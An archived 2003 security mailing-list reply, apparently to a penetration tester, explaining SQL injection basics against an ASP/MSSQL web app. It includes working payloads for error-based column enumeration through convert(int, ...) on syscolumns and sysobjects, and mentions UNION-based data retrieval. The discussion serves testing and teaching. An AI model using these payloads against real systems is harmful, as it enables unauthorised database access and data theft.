WebApp Sec mailing list archives

Re: SQL Injection Basics

From: NetNinja <netninja () hotmail kg>
Date: Sun, 9 Feb 2003 16:21:46 +0600

Hello raul,

Sunday, February 9, 2003, 7:21:47 AM, you wrote:


rjhc> I am pen testing a webapp and am having some problems with SQL injection. 

rjhc> The app creates an ODBC error. Is this a garuntee of SQL Injection ?

rjhc> If I use www.victim/test.asp?userid=sfdsd

rjhc> the error is "inncorrect syntax near line 28 of test.asp" (or thats the English translation equiv in my case).

try inputtin single quote " ' " and c if it throws back ODBC error.
rjhc> I know the database is called master, and has a table test. What is the syntax I should use ?

well u can try enumerating columns of ur TEST table like this
www.victim/test.asp?userid=' select convert(int,(select top 1 name from
syscolumns where id=(select id from sysobjects where name='TEST')))--
this will try to convert nvarchar value to int and throws back error
where u will c first column name of ur TEST table. then u proceed
further
www.victim/test.asp?userid=' select convert(int,select top 1 name from
syscolumns where id=object_id("TEST") and name>'put here column
name returned from previous query')--

once u know column names u can try to retrieve data with UNION
or with select convert()

something like that...

well u can check out some great papers written by top sql injection
ninjas like Kevin Spett, Chris Anley, Cesar Cerrudo and others.
interestin to read paypaz. :)
check out owasp.org

rjhc> What are the best freeware and open source tools for testing SQL injection ?
rjhc> I tried WPosion which was OK.
heh, havent heard of that

rjhc> I also tried WebSleuth (which seems to have gone from GPL to closed source commercial btw). Am I right is saying 
that the SQL plugin has to connect directly to the database to work ? I can only
rjhc> see port 80 so don't think this will work ?

rjhc> Thanks, Raul.



rjhc> Concerned about your privacy? Follow this link to get
rjhc> FREE encrypted email: https://www.hushmail.com/?l=2 

rjhc> Big $$$ to be made with the HushMail Affiliate Program: 
rjhc> https://www.hushmail.com/about.php?subloc=affiliate&l=427



-- 
Best regards,
 NetNinja                            mailto:netninja () hotmail kg

Current thread:

Re: SQL Injection Basics, (continued)
- - - Re: SQL Injection Basics dreamwvr () dreamwvr com (Feb 11)
    - Re: SQL Injection Basics Sverre H. Huseby (Feb 11)
    - Re: SQL Injection Basics Alex Russell (Feb 11)
    - Re: SQL Injection Basics Jerry Connolly (Feb 11)
    - Re: SQL Injection Basics dreamwvr () dreamwvr com (Feb 11)
    - Re: SQL Injection Basics Jerry Connolly (Feb 11)
    - Re: SQL Injection Basics Ken Anderson (Feb 11)
  - WebSleuth and the SQLInjeciton Plugin Phil Cox (Mar 10)
    - Re: WebSleuth and the SQLInjeciton Plugin Chip Andrews (Mar 10)
- Re: SQL Injection Basics davy van de moere (Feb 09)
- Re: SQL Injection Basics NetNinja (Feb 09)
- Re: SQL Injection Basics Dirk Gomez (Feb 10)
- RE: SQL Injection Basics Logan F.D. Greenlee (Feb 10)
- RE: SQL Injection Basics Brass, Phil (ISS Atlanta) (Feb 11)
- RE: SQL Injection Basics Eric Appelboom (Feb 11)
  - Re: SQL Injection Basics Kevin Spett (Feb 11)
  - RE: SQL Injection Basics Patrick Debois (Feb 11)
- RE: SQL Injection Basics Logan F.D. Greenlee (Feb 11)
- RE: SQL Injection Basics Mark Mcdonald (Feb 11)
  - Re: SQL Injection Basics Jim McGarvey (Feb 11)
    - Re: SQL Injection Basics Mark Curphey (Feb 11)

(Thread continues...)